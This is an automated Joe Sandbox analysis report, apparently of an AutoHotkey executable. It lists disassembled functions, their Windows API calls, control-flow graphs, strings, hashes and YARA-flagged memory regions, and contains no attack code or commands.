                                      control_flow_graph 1227 4846735-4846775 GetModuleFileNameA RegOpenKeyExA 1228 48467b7-48467fa call 484655d RegQueryValueExA 1227->1228 1229 4846777-4846793 RegOpenKeyExA 1227->1229 1234 48467fc-4846818 RegQueryValueExA 1228->1234 1235 484681e-4846838 RegCloseKey 1228->1235 1229->1228 1231 4846795-48467b1 RegOpenKeyExA 1229->1231 1231->1228 1232 4846840-4846871 lstrcpyn GetThreadLocale GetLocaleInfoA 1231->1232 1236 4846877-484687b 1232->1236 1237 4846970-4846976 1232->1237 1234->1235 1238 484681a 1234->1238 1239 4846887-484689e lstrlen 1236->1239 1240 484687d-4846881 1236->1240 1238->1235 1241 48468a3-48468a9 1239->1241 1240->1237 1240->1239 1242 48468b6-48468bf 1241->1242 1243 48468ab-48468b4 1241->1243 1242->1237 1245 48468c5-48468cc 1242->1245 1243->1242 1244 48468a0 1243->1244 1244->1241 1246 48468ce-48468f8 lstrcpyn LoadLibraryExA 1245->1246 1247 48468fa-48468fc 1245->1247 1246->1247 1247->1237 1248 48468fe-4846902 1247->1248 1248->1237 1249 4846904-4846938 lstrcpyn LoadLibraryExA 1248->1249 1249->1237 1250 484693a-484696e lstrcpyn LoadLibraryExA 1249->1250 1250->1237
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04846750
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484676E
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484678C
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 048467AA
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 048467F3
                                      • RegQueryValueExA.ADVAPI32(?,048469B5,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001), ref: 04846811
                                      • RegCloseKey.ADVAPI32(?,04846840,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04846833
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04846850
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0484685D
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04846863
                                      • lstrlen.KERNEL32(00000000), ref: 0484688E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 048468E3
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 048468F3
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0484691F
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0484692F
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846959
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846969
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                      • API String ID: 1759228003-2375825460
                                      • Opcode ID: bbd6538e6d1c43fe6041bcfa3e9533f272581454ed2a7b0a309baf20fadfc721
                                      • Instruction ID: cced0f7f03277c3bc0bde36223db55b550a74456c66866b81b93b4dcafafca48
                                      • Opcode Fuzzy Hash: bbd6538e6d1c43fe6041bcfa3e9533f272581454ed2a7b0a309baf20fadfc721
                                      • Instruction Fuzzy Hash: FF6165B1E0020DBEFB11DAE8CC49FEFB7BC9B89704F404651A545F6181E7F8AA848B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401EF4 Relevance: 30.3, APIs: 14, Strings: 3, Instructions: 528windowthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetForegroundWindow.USER32 ref: 00401D9A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401DAD
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 00401DCA
                                      • IsDialogMessageW.USER32(00000000,?), ref: 0040316C
                                      • SetCurrentDirectoryW.KERNEL32(004B0CF8), ref: 00403194
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountMessageTickWindow$ClassCurrentDialogDirectoryForegroundNameProcessThread
                                      • String ID: #32770$6Dd$8&
                                      • API String ID: 3752270653-3320845119
                                      • Opcode ID: c339f24e7893fe42b00ed86886aa114e0e565fd1beb847350322579138385d39
                                      • Instruction ID: 3cc67100834623ee9eae678e2b4d6fd3e59ff814be5be24b81a93013b3d4dfe5
                                      • Opcode Fuzzy Hash: c339f24e7893fe42b00ed86886aa114e0e565fd1beb847350322579138385d39
                                      • Instruction Fuzzy Hash: CB12A3719043429BDB258F28C98476BB7E5BB85304F19457FE845AB3E0D778DC42CB8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00481EC0 Relevance: 21.2, APIs: 14, Instructions: 174windowlibraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2552 481ec0-481ed3 2553 481ee3 2552->2553 2554 481ed5-481ee1 LoadLibraryExW 2552->2554 2555 481ee9-481eef 2553->2555 2554->2555 2556 481ef5-481ef9 2555->2556 2557 482057-482059 2555->2557 2558 481efb-481f00 2556->2558 2559 481f02 2556->2559 2560 48205b-48206f ExtractIconW 2557->2560 2561 482070-48208c ExtractIconW 2557->2561 2562 481f30-481f35 2558->2562 2563 481f09-481f2c EnumResourceNamesW 2559->2563 2564 481f04 2559->2564 2565 481f3b-481f47 FindResourceW 2562->2565 2566 482034-48203e 2562->2566 2563->2562 2564->2563 2565->2566 2569 481f4d-481f57 LoadResource 2565->2569 2567 482048-48204a 2566->2567 2568 482040-482042 2566->2568 2571 48204c-48204d FreeLibrary 2567->2571 2572 482053-482055 2567->2572 2568->2567 2570 482044-482046 2568->2570 2569->2566 2573 481f5d-481f68 LockResource 2569->2573 2570->2572 2571->2572 2572->2557 2575 48208d-482096 2572->2575 2573->2566 2574 481f6e-481f73 2573->2574 2576 481f7d-481f82 2574->2576 2577 481f75-481f79 2574->2577 2578 481f90-481f9d 2576->2578 2579 481f84-481f8c GetSystemMetrics 2576->2579 2577->2576 2580 48202c-482030 2578->2580 2581 481fa3 2578->2581 2579->2578 2580->2566 2582 481fa7-481fac 2581->2582 2583 481fae 2582->2583 2584 481fb3-481fb7 2582->2584 2583->2584 2585 481fb9-481fc0 2584->2585 2586 481fc2-481fc6 2584->2586 2587 481fc9-481fcb 2585->2587 2586->2587 2588 481fcd-481fcf 2587->2588 2589 481fd1-481fd8 2587->2589 2588->2589 2589->2582 2590 481fda-481fdc 2589->2590 2590->2580 2591 481fde-481ff0 FindResourceW 2590->2591 2591->2580 2592 481ff2-481ffc LoadResource 2591->2592 2592->2580 2593 481ffe-482009 LockResource 2592->2593 2593->2580 2594 48200b-482028 SizeofResource CreateIconFromResourceEx 2593->2594 2594->2580
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,?,00000000,FFFFFF61,00000000,00000000,00000000), ref: 00481ED9
                                      • EnumResourceNamesW.KERNEL32 ref: 00481F26
                                      • FindResourceW.KERNEL32(00400000,00400000,0000000E), ref: 00481F3F
                                      • LoadResource.KERNEL32(00400000,00000000), ref: 00481F4F
                                      • LockResource.KERNEL32(00000000), ref: 00481F5E
                                      • GetSystemMetrics.USER32(0000000B), ref: 00481F86
                                      • FindResourceW.KERNEL32(00400000,?,00000003), ref: 00481FE6
                                      • LoadResource.KERNEL32(00400000,00000000), ref: 00481FF4
                                      • LockResource.KERNEL32(00000000), ref: 00481FFF
                                      • SizeofResource.KERNEL32(00400000,00000000,00000001,00030000,00000000,00000000,00000000), ref: 0048201A
                                      • CreateIconFromResourceEx.USER32(00000000,00000000), ref: 00482022
                                      • FreeLibrary.KERNEL32(00400000), ref: 0048204D
                                      • ExtractIconW.SHELL32(00000000,?,?), ref: 00482062
                                      • ExtractIconW.SHELL32(00000000,?,-00000001), ref: 0048207F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Resource$IconLoad$ExtractFindLibraryLock$CreateEnumFreeFromMetricsNamesSizeofSystem
                                      • String ID:
                                      • API String ID: 2349713634-0
                                      • Opcode ID: 71fcffbb989d2cc579252a8f0588b47a8fde31afda6c5b6f58fbc39483ebfcdc
                                      • Instruction ID: cf0750a6d69fb2dd84317325baf1e51a53ca3267621c331d5fd8fddb3d20f19d
                                      • Opcode Fuzzy Hash: 71fcffbb989d2cc579252a8f0588b47a8fde31afda6c5b6f58fbc39483ebfcdc
                                      • Instruction Fuzzy Hash: D8511871605310ABD3206F689D44B7FBB9CEB45751F450E2BFE46D62A0D378C801C769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004517E0 Relevance: 20.0, APIs: 6, Strings: 5, Instructions: 797COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp$FreeLibrary__wcstoui64_memset
                                      • String ID: $CDecl$DllCall$Int$This DllCall requires a prior VarSetCapacity.
                                      • API String ID: 886327013-3585077685
                                      • Opcode ID: f7f1b444cf1eeba4568a0b5e1ca36cf6d060be7ccff34da2824006bd5bfca268
                                      • Instruction ID: ad3ab744a547d557392350973ade422c674137b3fe615dc0840b2f4eea0dbc38
                                      • Opcode Fuzzy Hash: f7f1b444cf1eeba4568a0b5e1ca36cf6d060be7ccff34da2824006bd5bfca268
                                      • Instruction Fuzzy Hash: 2852F370A002059FCB14DF58C881BAAB7B0FF45306F14856FED15AB3A2D779AC49CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0484683F Relevance: 15.1, APIs: 10, Instructions: 102stringlibrarythreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3565 484683f 3566 4846840-4846871 lstrcpyn GetThreadLocale GetLocaleInfoA 3565->3566 3567 4846877-484687b 3566->3567 3568 4846970-4846976 3566->3568 3569 4846887-484689e lstrlen 3567->3569 3570 484687d-4846881 3567->3570 3571 48468a3-48468a9 3569->3571 3570->3568 3570->3569 3572 48468b6-48468bf 3571->3572 3573 48468ab-48468b4 3571->3573 3572->3568 3575 48468c5-48468cc 3572->3575 3573->3572 3574 48468a0 3573->3574 3574->3571 3576 48468ce-48468f8 lstrcpyn LoadLibraryExA 3575->3576 3577 48468fa-48468fc 3575->3577 3576->3577 3577->3568 3578 48468fe-4846902 3577->3578 3578->3568 3579 4846904-4846938 lstrcpyn LoadLibraryExA 3578->3579 3579->3568 3580 484693a-484696e lstrcpyn LoadLibraryExA 3579->3580 3580->3568
                                      APIs
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04846850
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0484685D
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04846863
                                      • lstrlen.KERNEL32(00000000), ref: 0484688E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 048468E3
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 048468F3
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0484691F
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0484692F
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846959
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846969
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                      • String ID:
                                      • API String ID: 1599918012-0
                                      • Opcode ID: 7dade5298152fc593941fe503b6de554de437489973ea8f3d33dd2465c2d663e
                                      • Instruction ID: 84642a106dd61f17bc29ce3db29d73fef198437f26b13e2e16eeeac53a4fb06c
                                      • Opcode Fuzzy Hash: 7dade5298152fc593941fe503b6de554de437489973ea8f3d33dd2465c2d663e
                                      • Instruction Fuzzy Hash: 5A3173B1F0420D7EEF15DAE8C888FEE77BD9B98304F4046A1A545E2144E7F8AA858B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00480DC0 Relevance: 12.2, APIs: 8, Instructions: 164fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBCMT ref: 00480E8A
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480EB2
                                      • FindClose.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480ECA
                                      • _wcschr.LIBCMT ref: 00480F1D
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480F42
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480F52
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst_wcschr
                                      • String ID:
                                      • API String ID: 1717823228-0
                                      • Opcode ID: 797df0c256d5725ca41af4faac879a5c98edde5b889bfbd71742acaf223e7456
                                      • Instruction ID: ce61147d11e211d9d93b7a0dd572c10af8625b35c229563d86450140d323540b
                                      • Opcode Fuzzy Hash: 797df0c256d5725ca41af4faac879a5c98edde5b889bfbd71742acaf223e7456
                                      • Instruction Fuzzy Hash: 90512B729103019BC720AB50CC85EBF77A8EF85315F068D2AED4597281F778E90CC799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041EF50 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404330), ref: 0041EF8A
                                        • Part of subcall function 0047D030: _malloc.LIBCMT ref: 0047D04D
                                      • SetCurrentDirectoryW.KERNEL32(02C40078,004DA728,00000068,00000000,00000000,00000000,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F19A
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,004AF9A8,000000FF,00000000,00000001,ErrorLevel,00000000,00000003,02C40248,00000000,00000000,00000000,004DA728,00000068,00000000), ref: 0041F257
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FileTime$AttributesCurrentDirectorySystem_malloc
                                      • String ID: ErrorLevel$Script file not found:%s
                                      • API String ID: 2559509361-1401792684
                                      • Opcode ID: fd07aa19839ded81b48e4f55a6f5c531e72e7f26b61a6e09514ac9f759156bf5
                                      • Instruction ID: f61fc0c5e7512b7064b2c4a0a2e24b8162e34c72f8404382babc579a4a6b0bdd
                                      • Opcode Fuzzy Hash: fd07aa19839ded81b48e4f55a6f5c531e72e7f26b61a6e09514ac9f759156bf5
                                      • Instruction Fuzzy Hash: DE91CE316012009FC710EF6AEC85B9677A4EB48328F14857FE904973A1D779DC96CB9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04871EA9 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 164958952a65646381214db1b4a055e44a1e221444857ac4ad8b7e5867382ee1
                                      • Instruction ID: 6e71f3fd683d6d893fd659b75804d9e834990793f6b68d16eeadc50ce1179f04
                                      • Opcode Fuzzy Hash: 164958952a65646381214db1b4a055e44a1e221444857ac4ad8b7e5867382ee1
                                      • Instruction Fuzzy Hash: BEA012104085014EC404A75D5C4240B318019C0014FC40720745CD9281E705D56402D7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444DE0 Relevance: 95.4, APIs: 50, Strings: 4, Instructions: 941registrywindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00444E01
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00445593
                                        • Part of subcall function 0041EB40: _wcsncpy.LIBCMT ref: 0041EB94
                                        • Part of subcall function 0041EB40: SetCurrentDirectoryW.KERNEL32(004B0CF8,00000000,004DA6A0,004DA6A0,00000000), ref: 0041EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$CurrentDirectoryMessageProcRegister_wcsncpy
                                      • String ID: 9000$AHK_ATTACH_DEBUGGER$TaskbarCreated$localhost
                                      • API String ID: 4277639754-182697789
                                      • Opcode ID: c8cdfe95fa883433c8f5fbbb41619d7f9c8b2ba8b67caa1e0989f1b7f940f9d9
                                      • Instruction ID: 311e400f69146cca57776dcc6bbd09bd6731533809533cfdbb805ac6c7e01d95
                                      • Opcode Fuzzy Hash: c8cdfe95fa883433c8f5fbbb41619d7f9c8b2ba8b67caa1e0989f1b7f940f9d9
                                      • Instruction Fuzzy Hash: 9962D172701604AFEB20DF69EC84A6B77A5EB85311F04492BF946C7392D735EC10CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041E0D0 Relevance: 58.0, APIs: 24, Strings: 9, Instructions: 253windowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • _memset.LIBCMT ref: 0041E102
                                        • Part of subcall function 00481EC0: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,?,00000000,FFFFFF61,00000000,00000000,00000000), ref: 00481ED9
                                        • Part of subcall function 00481EC0: FindResourceW.KERNEL32(00400000,00400000,0000000E), ref: 00481F3F
                                        • Part of subcall function 00481EC0: LoadResource.KERNEL32(00400000,00000000), ref: 00481F4F
                                        • Part of subcall function 00481EC0: LockResource.KERNEL32(00000000), ref: 00481F5E
                                        • Part of subcall function 00481EC0: GetSystemMetrics.USER32(0000000B), ref: 00481F86
                                        • Part of subcall function 00481EC0: FindResourceW.KERNEL32(00400000,?,00000003), ref: 00481FE6
                                        • Part of subcall function 00481EC0: LoadResource.KERNEL32(00400000,00000000), ref: 00481FF4
                                        • Part of subcall function 00481EC0: LockResource.KERNEL32(00000000), ref: 00481FFF
                                      • GetSystemMetrics.USER32(00000031), ref: 0041E14C
                                        • Part of subcall function 00481EC0: EnumResourceNamesW.KERNEL32 ref: 00481F26
                                        • Part of subcall function 00481EC0: SizeofResource.KERNEL32(00400000,00000000,00000001,00030000,00000000,00000000,00000000), ref: 0048201A
                                        • Part of subcall function 00481EC0: CreateIconFromResourceEx.USER32(00000000,00000000), ref: 00482022
                                        • Part of subcall function 00481EC0: ExtractIconW.SHELL32(00000000,?,?), ref: 00482062
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0041E17C
                                      • RegisterClassExW.USER32 ref: 0041E1A1
                                      • RegisterClassExW.USER32(?), ref: 0041E1EA
                                      • GetForegroundWindow.USER32 ref: 0041E1F1
                                      • GetClassNameW.USER32(00000000,?,00000040), ref: 0041E203
                                      • __wcsicoll.LIBCMT ref: 0041E217
                                      • CreateWindowExW.USER32(00000000,AutoHotkey,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00400000,00000000), ref: 0041E26E
                                      • GetMenu.USER32(00000000), ref: 0041E29E
                                      • EnableMenuItem.USER32(00000000,0000FF79,00000003), ref: 0041E2AE
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50A00804,00000000,00000000,00000000,00000000,00000000,00000001,00400000,00000000), ref: 0041E2F5
                                      • GetDC.USER32(00000000), ref: 0041E305
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041E33E
                                      • MulDiv.KERNEL32(0000000A,00000000), ref: 0041E347
                                      • CreateFontW.GDI32(00000000), ref: 0041E350
                                      • ReleaseDC.USER32(00030450,00000000), ref: 0041E363
                                      • SendMessageW.USER32(00030450,00000030,7B0A0E4C,00000000), ref: 0041E380
                                      • SendMessageW.USER32(00030450,000000C5,00000000,00000000), ref: 0041E392
                                      • ShowWindow.USER32(0002044A,00000000), ref: 0041E3A2
                                      • ShowWindow.USER32(0002044A,00000000), ref: 0041E3AD
                                      • ShowWindow.USER32(0002044A,00000006), ref: 0041E3BC
                                      • SetWindowLongW.USER32(0002044A,000000EC,00000000), ref: 0041E3C8
                                      • LoadAcceleratorsW.USER32(00400000,000000D4), ref: 0041E3DA
                                        • Part of subcall function 0041E510: _memset.LIBCMT ref: 0041E520
                                        • Part of subcall function 0041E510: _wcsncpy.LIBCMT ref: 0041E592
                                        • Part of subcall function 0041E510: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0041E5A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Resource$Window$Load$Create$ClassIconShow$FindLockMenuMessageMetricsRegisterSendSystem_memset$AcceleratorsCapsCursorDeviceEnableEnumExtractFontForegroundFromItemLibraryLongNameNamesNotifyReleaseShell_Sizeof__wcsicoll_wcsncpy
                                      • String ID: 0$AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$RegClass$Shell_TrayWnd$edit
                                      • API String ID: 2663150501-3882032541
                                      • Opcode ID: 0ffa2671344ac2b411b3940b835af6ef24a72abeec5c2d2f6dd451c22f5dee75
                                      • Instruction ID: 0e34028e40d4e23f5c5e0c8176ff6781b07e660b381e0ad69735c3f8942d17fc
                                      • Opcode Fuzzy Hash: 0ffa2671344ac2b411b3940b835af6ef24a72abeec5c2d2f6dd451c22f5dee75
                                      • Instruction Fuzzy Hash: B981C8B5B44300BBE720AB61DC45FA73BA8EB45704F14052BFA05E72D0D7B8A844CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0489EB61 Relevance: 44.1, APIs: 3, Strings: 22, Instructions: 393sleepthreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

